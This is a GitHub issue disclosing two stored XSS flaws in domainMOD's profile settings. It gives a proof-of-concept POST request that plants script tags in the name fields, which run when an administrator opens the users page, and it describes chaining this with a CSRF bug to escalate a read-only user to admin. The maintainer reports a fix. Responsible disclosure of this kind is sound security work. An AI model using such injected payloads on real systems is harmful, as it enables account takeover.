Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There are two Stored XSS vulnerability #66

Closed
anquanquantao opened this issue May 29, 2018 · 2 comments
Closed

There are two Stored XSS vulnerability #66

anquanquantao opened this issue May 29, 2018 · 2 comments
Assignees

Comments

@anquanquantao
Copy link

There are two Stored XSS vulnerability.
read-only user use the add the Stored XSS and CSRF can add administrator account or change the read-only user to admin or change admin password……

poc:
after read-only user login
post url https://demo.domainmod.org/settings/profile/
post data:new_first_name=test%22%3E%3Cscript%3Ealert%28%2F1111%2F%29%3C%2Fscript%3E&new_last_name=test%22%3E%3Cscript%3Ealert%28%2F2222%2F%29%3C%2Fscript%3E&new_email_address=test%40test.com&new_currency=USD&new_timezone=Canada%2FPacific&new_expiration_emails=0

then the admin login ,open the url https://demo.domainmod.org/admin/users/. the javascript will execution. with CSRF vulnerability(#65) , a read-only user can add administrator account or change the read-only user to admin or change admin password……

@chetcuti chetcuti self-assigned this Aug 31, 2018
@chetcuti
Copy link
Member

chetcuti commented Feb 3, 2019

This was fixed in v4.12.0, which was released earlier today.

Thanks for the report!

@chetcuti chetcuti closed this as completed Feb 3, 2019
@NicoleG25
Copy link

@chetcuti could you please point me to the fix/commit? :) thanks.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

3 participants